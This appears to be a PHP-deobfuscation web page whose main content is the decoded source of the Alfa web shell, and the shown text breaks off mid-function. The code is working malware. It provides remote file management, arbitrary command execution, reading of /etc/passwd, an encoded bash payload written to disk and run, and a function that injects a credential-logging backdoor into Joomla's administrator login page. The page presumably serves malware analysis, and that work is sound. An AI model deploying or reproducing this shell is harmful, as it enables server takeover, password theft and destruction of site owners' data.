Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

?> $GLOBALS["\104\102\137\116\101\115\x45"]["\x75\163\x65\x72"], "\x41\x6c\146\141\120\x61..

Decoded Output download

<?  ?> $GLOBALS["DB_NAME"]["user"], "AlfaPass" => $GLOBALS["DB_NAME"]["pass"], "AlfaProtectShell" => $GLOBALS["DB_NAME"]["safemode"], "AlfaLoginPage" => $GLOBALS["DB_NAME"]["login_page"]); goto GehJu; S12M6: @ini_set("log_errors", 0); goto xX0N2; JxZhl: function alfaFilesMan() { goto duJYK; lwj7j: $dirs = $files = array(); goto SoWz0; WtHTS: $sort = array("name", 1); goto p3NoF; DHDQP: alfafooter(); goto gpn7f; skbF9: $l = 0; goto QBThI; EUVur: function alfaCmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } goto uea1z; SoWz0: $n = count($dirContent); goto I_aiv; xuS6l: echo "<div class="ajaxarea"><div class="header">"; goto JVp0a; PtbI1: $cmd_dir = false; goto C8q_h; f6bDN: echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
\xa<input type=hidden name=c value='" . htmlspecialchars(isset($GLOBALS["glob_chdir_false"]) ? $_POST["c"] : $GLOBALS["cwd"]) . "'>
\xa<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xd\xa<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>\xd
<input type='submit' value=' '>\xd
</form></table></div></div>"; goto DHDQP; I_aiv: for ($i = 0; $i < $n; $i++) { if ($cmd_dir) { goto S3QOf; gOlwx: $file_owner = $dirContent[$i]["owner"]; goto eUcle; eUcle: $file_group = $dirContent[$i]["group"]; goto U5DKR; h8jrO: $file_size = $dirContent[$i]["size"]; goto aQ9Y6; TxWuo: $file_perm = alfaPermsColor(array("class" => $dirContent[$i]["permcolor"], "num" => $dirContent[$i]["permnum"], "human" => $dirContent[$i]["permhuman"]), true); goto h8jrO; aQ9Y6: $file_path = $_SESSION[__LAST_CWD__] . "/" . $dirContent[$i]["name"]; goto krOdm; U5DKR: $file_modify = @date("Y-m-d H:i:s", $dirContent[$i]["modify"]); goto TxWuo; S3QOf: $filename = $dirContent[$i]["name"]; goto gOlwx; krOdm: } else { goto OedA6; JU245: $file_group = $gr["name"] ? $gr["name"] : (function_exists("filegroup") ? @filegroup($GLOBALS["cwd"] . $filename) : "????"); goto LOMR0; Vmaz0: $file_size = @filesize($GLOBALS["cwd"] . $filename); goto WcuKu; nVBZv: $ow = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($GLOBALS["cwd"] . $filename)) : array("name" => "????"); goto fFA09; LOMR0: $file_modify = @date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $filename)); goto zdFX2; fFA09: $gr = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($GLOBALS["cwd"] . $filename)) : array("name" => "????"); goto Rf8ur; WcuKu: $file_path = $GLOBALS["cwd"] . $filename; goto bheCw; zdFX2: $file_perm = alfaPermsColor($GLOBALS["cwd"] . $filename); goto Vmaz0; Rf8ur: $file_owner = $ow["name"] ? $ow["name"] : (function_exists("fileowner") ? @fileowner($GLOBALS["cwd"] . $filename) : "????"); goto JU245; OedA6: $filename = $dirContent[$i]; goto nVBZv; bheCw: } $tmp = array("name" => $filename, "path" => $file_path, "modify" => $file_modify, "perms" => $file_perm, "size" => $file_size, "owner" => $file_owner, "group" => $file_group); if (!$cmd_dir) { if (@is_file($file_path)) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($file_path)) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($file_path) && $filename != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } else { if ($dirContent[$i]["type"] == "file") { $files[] = array_merge($tmp, array("type" => "file")); } else { if ($dirContent[$i]["name"] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } } } goto zO2bu; C8q_h: if ($dirContent === false) { if (_alfa_can_runCommand(true, true)) { goto askj3; KjrXK: if (is_array($dirContent)) { array_pop($dirContent); $cmd_dir = true; } else { $dirContent = false; } goto JDsIO; pd_1E: $dirContent = json_decode($dirContent, true); goto KjrXK; ro9s0: if (!isset($_SESSION["alfachdir_bash"]) || @(!file_exists("alfacgiapi/getdir.alfa"))) { $bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs="; alfaWriteTocgiapi("getdir.alfa", $bash); } goto rDlvd; rDlvd: if (empty($_SESSION[__LAST_CWD__])) { $_SESSION[__LAST_CWD__] = "/"; } goto efP1i; efP1i: $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '" . addslashes($_SESSION[__LAST_CWD__]) . "'"); goto pd_1E; askj3: @chdir(dirname($_SERVER["SCRIPT_FILENAME"])); goto ro9s0; JDsIO: $_SESSION["alfachdir_bash"] = true; goto zzXfk; zzXfk: } } goto D0g25; WeVgi: echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>"; goto lwj7j; IroYI: global $sort; goto WtHTS; uea1z: usort($files, "alfaCmp"); goto yoj1J; NNBGm: AlfaNum(8, 9, 10, 7, 6, 5, 4); goto xuS6l; zO2bu: $GLOBALS["sort"] = $sort; goto EUVur; p3NoF: if (!empty($_POST["alfa1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["alfa1"], $match)) { $sort = array($match[1], (int) $match[2]); } } goto WeVgi; duJYK: alfahead(); goto NNBGm; JVp0a: if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } goto Lfeg0; n8mTR: if (isset($_SESSION[__LAST_CWD__]) && !isset($_POST["c"]) && $_SESSION[__LAST_CWD__] != '') { $dirContent = @scandir($_SESSION[__LAST_CWD__]); } else { goto Fht2z; Fht2z: $dirContent = @scandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); goto CHQlz; CQ_lX: $_SESSION[__LAST_CWD__] = str_replace(array("..", "//"), array('', "/"), $_POST["c"]); goto ew1re; CHQlz: if (preg_match("#(.*)\/\.\.#", $_POST["c"], $res)) { goto Q9KYR; V9_bo: array_pop($path); goto XdGjb; XdGjb: $_POST["c"] = implode("/", $path); goto wtV3i; Q9KYR: $path = explode("/", $res[1]); goto V9_bo; wtV3i: } goto CQ_lX; ew1re: } goto PtbI1; yoj1J: usort($dirs, "alfaCmp"); goto YBIhE; YBIhE: $files = array_merge($dirs, $files); goto skbF9; QBThI: $cc = 0; goto Dvssi; D0g25: if ($dirContent == false) { goto MoX_m; N7pDN: alfaFooter(); goto PGsYB; PGsYB: return; goto ZuIHV; MoX_m: echo "<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>"; goto N7pDN; ZuIHV: } goto IroYI; Lfeg0: if (!empty($_POST["alfa1"])) { switch ($_POST["alfa1"]) { case "uploadFile": goto nFrZA; iJ9cM: $files = reArrayFiles($_FILES["f"]); goto LKlho; C1sM_: break; goto tPFtg; nFrZA: if (isset($GLOBALS["glob_chdir_false"])) { $alfa_canruncmd = _alfa_can_runCommand(true, true); $move_cmd_file = true; } goto iJ9cM; LKlho: foreach ($files as $file) { if ($move_cmd_file) { alfaEx("cat '" . addslashes($file["tmp_name"]) . "' > '" . addslashes($_POST["c"] . "/" . $file["name"]) . "'"); } else { @move_uploaded_file($file["tmp_name"], $file["name"]); } echo "uped...!<Br>"; } goto C1sM_; tPFtg: case "mkdir": goto zjQZL; trGwn: if (isset($GLOBALS["glob_chdir_false"])) { if (_alfa_can_runCommand(true, true)) { alfaEx("cd '" . trim(addslashes($_POST["c"])) . "';mkdir '" . trim(addslashes($_POST["alfa2"])) . "'"); } } else { if (!@mkdir(trim($_POST["alfa2"]))) { echo "<b><font color='red'>Can't create new dir !</b></font>"; } } goto kyYaF; zjQZL: $new_dir_cmd = false; goto trGwn; kyYaF: break; goto iYsuI; iYsuI: case "delete": goto U7_yX; ghm5F: if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { goto bdhob; w39Ld: if (isset($GLOBALS["glob_chdir_false"])) { if (_alfa_can_runCommand(true, true)) { alfaEx("rm -rf '" . addslashes($_POST["c"] . "/" . $f) . "'"); } } else { alfaEx("rm -rf '" . addslashes($f) . "'", false, false); if (@is_dir($f)) { deleteDir($f); } else { @unlink($f); } } goto Nj3wU; bdhob: if ($f == "..") { continue; } goto mkyFd; mkyFd: $f = rawurldecode($f); goto w39Ld; Nj3wU: } } goto c73o_; U7_yX: function deleteDir($path) { goto zHnD7; dcoCs: @rmdir($path); goto PxiSp; YNXrR: $dh = @opendir($path); goto qnfW8; qnfW8: while (($item = @readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == ".." || basename($item) == ".") { continue; } $type = @filetype($item); if ($type == "dir") { deleteDir($item); } else { @unlink($item); } } goto ActEs; ActEs: @closedir($dh); goto dcoCs; zHnD7: $path = substr($path, -1) == "/" ? $path : $path . "/"; goto YNXrR; PxiSp: } goto ghm5F; c73o_: if (@is_dir(rawurldecode(@$_POST["alfa2"])) && rawurldecode(@$_POST["alfa2"]) != "..") { deleteDir(rawurldecode(@$_POST["alfa2"])); alfaEx("rm -rf '" . addslashes($_POST["alfa2"]) . "'", false, false); } else { @unlink(rawurldecode(@$_POST["alfa2"])); } goto hvNWx; hvNWx: if (isset($GLOBALS["glob_chdir_false"])) { $source = rawurldecode(@$_POST["alfa2"]); if ($source != ".." && !empty($source)) { if (_alfa_can_runCommand(true, true)) { alfaEx("cd '" . trim(addslashes($_POST["c"])) . "';rm -rf '" . addslashes($source) . "'"); } } } goto jXN7M; jXN7M: break; goto sgp8x; sgp8x: case "paste": goto gU00R; Frxux: unset($_SESSION["f"]); goto yikH4; gU00R: if ($_SESSION["act"] == "copy" && isset($_SESSION["f"])) { function copy_paste($c, $s, $d) { if (@is_dir($c . $s)) { goto AnirJ; Py1zk: while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } goto j0p0H; SaQTf: $h = @opendir($c . $s); goto Py1zk; AnirJ: @mkdir($d . $s); goto SaQTf; j0p0H: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_SESSION["f"] as $f) { copy_paste($_SESSION["c"], $f, $GLOBALS["cwd"]); } } elseif ($_SESSION["act"] == "move" && isset($_SESSION["f"])) { function move_paste($c, $s, $d) { if (@is_dir($c . $s)) { goto ac1Cn; LqZvf: $h = @opendir($c . $s); goto W0VlY; W0VlY: while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } goto KJcDZ; ac1Cn: @mkdir($d . $s); goto LqZvf; KJcDZ: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_SESSION["f"] as $f) { @rename($_SESSION["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_SESSION["act"] == "zip" && isset($_SESSION["f"])) { if (class_exists("ZipArchive")) { goto bkzQ0; bkzQ0: $zip = new ZipArchive(); goto Y1mGP; O8EPF: if ($zip->open($zipX, 1)) { goto eB2Ur; eB2Ur: @chdir($_SESSION["c"]); goto prdrP; ochQ8: @chdir($GLOBALS["cwd"]); goto Qw85v; Qw85v: $zip->close(); goto eGa2w; prdrP: foreach ($_SESSION["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_SESSION["c"] . $f)) { $zip->addFile($_SESSION["c"] . $f, $f); } elseif (@is_dir($_SESSION["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/")); foreach ($iterator as $key => $value) { $key = str_replace("\", "/", realpath($key)); if (@is_dir($key)) { if (in_array(substr($key, strrpos($key, "/") + 1), array(".", ".."))) { continue; } } else { $zip->addFile($key, $key); } } } } goto ochQ8; eGa2w: __alert(">> " . $zipX . " << is created..."); goto yFWry; yFWry: } goto WO0iX; Y1mGP: $zipX = "alfa_" . rand(1, 1000) . ".zip"; goto O8EPF; WO0iX: } } elseif ($_SESSION["act"] == "unzip" && isset($_SESSION["f"])) { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_SESSION["f"] as $f) { if ($zip->open($_SESSION["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } goto Frxux; yikH4: break; goto zfifs; zfifs: default: if (!empty($_POST["alfa1"])) { goto DvNq0; YcC3H: $_SESSION["f"] = @$_POST["f"]; goto skGlZ; skGlZ: $_SESSION["c"] = @$_POST["c"]; goto lcSeJ; DvNq0: $_SESSION["act"] = @$_POST["alfa1"]; goto YcC3H; lcSeJ: } break; } } goto n8mTR; Dvssi: foreach ($files as $f) { goto A3A7y; AnjMF: $cc++; goto by7w4; asXEB: echo "<tr" . ($l ? " class=l1" : '') . "><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="" . $raw_name . "" class="chkbx" id="" . $checkbox . ""><label for="" . $checkbox . ""></label></div></td><td>" . $icon . "<div style="" . $style . ""><a class="main_name" href=javascript:void(0) onclick="" . ($f["type"] == "file" ? "editor('" . $raw_name . "','auto','','','','" . $f["type"] . "');">" . ($GLOBALS["cwd"] . $f["name"] == $GLOBALS["__file_path"] ? "<span class='shell_name' style='font-weight:unset;'>" . $f["name"] . "</span>" : htmlspecialchars($newname)) : "g('FilesMan','" . $f["path"] . "');" title=" . $f["link"] . "><b>| " . htmlspecialchars($f["name"]) . " |</b>") . "</a></td></div><td><span style="font-weight:unset;" class="main_size">" . ($f["type"] == "file" ? alfaSize($f["size"]) : $f["type"]) . "</span></td><td><span style="font-weight:unset;" class="main_modify">" . $f["modify"] . "</span></td><td><span style="font-weight:unset;" class="main_owner_group">" . $f["owner"] . "/" . $f["group"] . "</span></td><td><a href=javascript:void(0) onclick="editor('" . $raw_name . "','chmod','','','','" . $f["type"] . "')">" . $f["perms"] . "</td><td><a class="actions" href="javascript:void(0);" onclick="editor('" . $raw_name . "', 'rename','','','','" . $f["type"] . "')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor('" . $raw_name . "', 'touch','','','','" . $f["type"] . "')">T</a>" . ($f["type"] == "file" ? " <a class="actions" href="javascript:void(0);" onclick="editor('" . $raw_name . "', 'edit','','','','" . $f["type"] . "')">E</a> <a class="actions" href="javascript:void(0);" onclick="g('FilesTools',null,'" . $raw_name . "', 'download')">D</a>" : '') . "<a class="actions" href="javascript:void(0);" onclick="var chk = confirm('Are You Sure For Delete # " . addslashes(rawurldecode($f["name"])) . " # ?'); chk ? g('FilesMan',null,'delete', '" . $raw_name . "') : '';"> X </a></td></tr>"; goto y87bG; A3A7y: $f["name"] = htmlspecialchars($f["name"]); goto sLost; jiEos: $raw_name = rawurlencode($f["name"]); goto WJAsT; MLWmU: $style = $GLOBALS["DB_NAME"]["show_icons"] ? "position:relative;display:inline-block;bottom:12px;" : ''; goto asXEB; WJAsT: $icon = $GLOBALS["DB_NAME"]["show_icons"] ? "<img src="" . findicon($f["name"], $f["type"]) . "" width="30" height="30">" : ''; goto MLWmU; sLost: $newname = mb_strlen($f["name"], "UTF-8") > 60 ? mb_substr($f["name"], 0, 60, "utf-8") . "..." : $f["name"]; goto dHew7; dHew7: $checkbox = "checkbox" . $cc; goto jiEos; y87bG: $l = $l ? 0 : 1; goto AnjMF; by7w4: } goto f6bDN; gpn7f: } goto iDAKi; IAq2M: function hijackJoomla($path, $saveto) { goto Jz1zi; qCuP8: $code = str_replace("{saveto_path}", $saveto, $code); goto bS6X1; Jz1zi: $code = "<?php jimport('joomla.user.authentication');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array('username'=>$_POST['username'],'password'=>$_POST['passwd']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST['passwd']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>"; goto qCuP8; JMnbv: if (@is_file($login) and @is_writable($login) and $login != '') { goto kpCV6; wksDE: @file_put_contents($login, $evil_login); goto nxIrl; kpCV6: $data_login = @file_get_contents($login); goto OjDqa; nxIrl: hijackOutput(0, $saveto); goto E2ZWK; OjDqa: $evil_login = $code . "\xa" . $data_login; goto wksDE; E2ZWK: } else { hijackOutput(1); } goto qCeM_; Ej9ok: if (@is_file($comp . "/login.php")) { $login = $comp . "/login.php"; } elseif (@is_file($comp . "/admin.login.php")) { $login = $comp . "/admin.login.php"; } else { $login = ''; } goto JMnbv; bS6X1: $comp = $path . "/administrator/components/com_login/"; goto Ej9ok; qCeM_: } goto DFLIu; PDb5Q: $GLOBALS["need_to_update_header"] = "false"; goto aS3hK; JjHhJ: if (!isset($GLOBALS["DB_NAME"]["safemode"])) { exit("$GLOBALS['DB_NAME']['safemode']"); } goto I2eZU; FDVwi: function alfafooter() { if (!isset($_POST["ajax"])) { echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
<tr>
\xa<td width='17%'><form onsubmit="if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>\xd\xa<td width='21%'><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
<td width='22%'><form onsubmit="g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
\xa<td width='19%'><form onsubmit="if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
\xa</tr>
<tr>
<td colspan='2'><form onsubmit='g("FilesMan",this.c.value,"");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='" . htmlspecialchars($GLOBALS["cwd"]) . "'> <input type='submit' value=' '></form></td>\xd
<td colspan='2'><form onsubmit="editor(this.file.value,'auto','','','','file');return false;"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
</tr>\xd\xa<tr>\xd
<td colspan='4'><form onsubmit="g('proc',null,this.c.value);this.c.value='';return false;"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>\xd
</tr>\xd
<tr>\xd
<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
<input type='hidden' name='a' value='FilesMAn'>
\xa<input type='hidden' name='c' value='" . $GLOBALS["cwd"] . "'>\xd\xa<input type='hidden' name='alfa1' value='uploadFile'>\xd
<input type='hidden' name='charset' value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
\xa<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam &copy; 2012-" . date("Y") . " ]</span></td>\xd\xa</tr>\xd\xa</table>
</div>
\xa<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize("cgiloader");'></div><div onClick='editorClose("cgiloader");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>\xd\xa<div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize("editor");'></div><div onClick='editorClose("editor");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>\xd\xa<div id='update-content'></div>\xd
<div id='editor-minimized' onclick='showEditor("editor");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>\xd
<div id='cgiloader-minimized' onclick='showEditor("cgiloader");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>
<script>\xd\xa\x9$('search-input').addEventListener('keydown', function(e){
\xa		setTimeout(function(){
\x9		var string = $('search-input').value\xd\xa	\x9\x9d.getElementsByClassName('history-list')[0].innerHTML = '';
\xa\x9	\x9for(var i in editor_files){\xd\xa\x9\x9\x9\x9if(editor_files[i].file.search(string) != -1 || string == ''){\xd
	\x9	\x9	var mode = 0;
					if(i == editor_current_file){\xd
					\x9mode = ' is_active';\xd\xa	\x9		\x9}
	\x9	\x9\x9insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);
\x9			}
\x9\x9	}
	\x9}, 100);\xd
\x9},false);
\xa	_Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){
\x9\x9d.body.insertAdjacentHTML('beforeend', res);
\xa	});
\xa	if(" . $GLOBALS["need_to_update_header"] . "){\xd\xa		_Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){\xd
\x9\x9\x9try{
\xa		\x9	var data = JSON.parse(res);
		\x9\x9console.log(data);
\x9	\x9\x9for(var i in data){\xd\xa\x9\x9		\x9var html = '';\xd\xa\x9			\x9for(var b = 0; b < data[i].length; b++){\xd\xa\x9\x9			\x9if(i=='useful'||i=='downloader'){
	\x9\x9\x9\x9	\x9html += '<span class="header_values" style="margin-left: 4px;">'+data[i][b]+'</span>';\xd
						}else{
\xa			\x9\x9\x9\x9html += data[i][b];
\xa				\x9\x9}
\x9	\x9	\x9}
\xa\x9		\x9\x9var elem = $('header_'+i);
\xa\x9			\x9if(elem){elem.innerHTML = html;}\xd\xa	\x9		}
	\x9\x9	$('header_cgishell').innerHTML = 'ON';\xd
		\x9	$('header_cgishell').setAttribute('class', 'header_on');
\xa\x9\x9	}catch(e){console.log(e)}
\xa\x9\x9});
	}else if(islinux){
	\x9_Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){\xd
\x9		if(res=='ok'){\xd
	\x9		$('header_cgishell').innerHTML = 'ON';
\x9\x9\x9	$('header_cgishell').setAttribute('class', 'header_on');
\x9\x9	}
\xa		});
\xa	}
\xa</script>
\xa</body>
</html>\xd
"; } } goto oBMyV; iDAKi: function alfaFilesTools() { goto ClaEI; z81PZ: switch ($_POST["alfa2"]) { case "view": goto mc31J; WgF13: echo "</pre></div></div>"; goto rcc61; rcc61: break; goto Cp0fB; mc31J: @chdir($_POST["c"]); goto D40ig; rMaPt: echo htmlspecialchars(__read_file($_POST["alfa1"])); goto WgF13; D40ig: echo "<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard('view_ml_content');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">"; goto rMaPt; Cp0fB: case "highlight": goto zRfZU; fX2w0: break; goto ptTt8; MMQhc: if (@is_readable($_POST["alfa1"])) { goto L_gy2; i2_hD: echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $code) . "</div></div></div>"; goto qKqVo; jL387: $code = @highlight_file($_POST["alfa1"], true); goto i2_hD; L_gy2: echo "<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">"; goto jL387; qKqVo: } goto fX2w0; zRfZU: @chdir($_POST["c"]); goto MMQhc; ptTt8: case "delete": goto byClp; T3DtZ: break; goto M3DI_; RzunF: if (@is_writable($_POST["alfa1"]) || isset($GLOBALS["glob_chdir_false"])) { goto R22oO; R22oO: $deleted = true; goto TJSFS; TJSFS: if (!@unlink($_POST["alfa1"])) { $deleted = false; if ($alfa_canruncmd) { if (_alfa_is_writable($_POST["alfa1"])) { alfaEx("rm -f '" . addslashes($_POST["alfa1"]) . "'"); $deleted = true; } } } goto j4hi5; j4hi5: if ($deleted) { echo "File Deleted...<script>var elem = $("" . $_POST["alfa4"] . "").parentNode;elem.parentNode.removeChild(elem);delete editor_files["" . $_POST["alfa4"] . ""];</script>"; } else { echo "Error..."; } goto TMIph; TMIph: } goto T3DtZ; byClp: @chdir($_POST["c"]); goto RzunF; M3DI_: case "chmod": goto BCgRy; xKhuY: echo "<script>alfa3_="";</script><form onsubmit="editor('" . addslashes($_POST["alfa1"]) . "','" . $_POST["alfa2"] . "',this.chmod.value,'" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "');return false;"><input type="text" name="chmod" value="" . $file_perm . ""><input type=submit value=" "></form>"; goto RTiai; RTiai: break; goto aJrJk; ILPJX: if (!empty($_POST["alfa3"])) { goto J0wt2; Yxlso: for ($i = strlen($_POST["alfa3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["alfa3"][$i] * pow(8, strlen($_POST["alfa3"]) - $i - 1); } goto xNHVf; xNHVf: if (!@chmod($_POST["alfa1"], $perms)) { if ($chdir_fals && $alfa_canruncmd) { alfaEx("cd '" . addslashes($_POST["c"]) . "';chmod " . addslashes($_POST["alfa3"]) . " '" . addslashes($alfa1_decoded) . "'"); echo "Success!"; } else { echo "<font color="#FFFFFF"><b>Can't set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>"; } } else { echo "Success!"; } goto BvsWX; J0wt2: $perms = 0; goto Yxlso; BvsWX: } goto tqsge; BCgRy: @chdir($_POST["c"]); goto ILPJX; tqsge: clearstatcache(); goto mF4aj; jjKBL: if ($chdir_fals) { $file_perm = $file_info[5]; } else { $file_perm = substr(sprintf("%o", @fileperms($_POST["alfa1"])), -4); } goto xKhuY; mF4aj: AlfaNum(8, 9, 10, 7, 6, 5, 4, 2, 1); goto jjKBL; aJrJk: case "edit": goto GOBDH; GOBDH: @chdir($_POST["c"]); goto p_c_E; XXUiY: echo "<button class="button" style="border-radius:10px;" onClick="copyToClipboard('edit_textarea_content');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor('" . addslashes($alfa1_decoded) . "','" . $_POST["alfa2"] . "','1'+this.text.value,'" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">"; goto l0hTA; l0hTA: echo htmlspecialchars(__read_file($_POST["alfa1"])); goto JUoPf; RtRTI: if (!empty($_POST["alfa3"])) { goto Rubdo; Rubdo: $_POST["alfa3"] = substr($_POST["alfa3"], 1); goto URz9V; R1wrf: if ($chdir_fals && $alfa_canruncmd) { goto Mi0K3; l2YVw: if ($fp = @__write_file($filepath, $_POST["alfa3"])) { alfaEx("mv '" . addslashes($filepath) . "' '" . addslashes($_POST["alfa1"]) . "';rm -f '" . addslashes($filepath) . "'"); } goto QIYG8; YZZeU: $filepath = dirname($_SERVER["SCRIPT_FILENAME"]) . "/" . $randname; goto l2YVw; mS4Ik: $randname = $rname . rand(111, 9999); goto YZZeU; Mi0K3: $rname = $alfa1_decoded; goto mS4Ik; QIYG8: } goto GILPT; dsfcG: $fp = @__write_file($_POST["alfa1"], $_POST["alfa3"]); goto R1wrf; GILPT: if ($fp) { echo "Saved!<br><script>alfa3_="";</script>"; 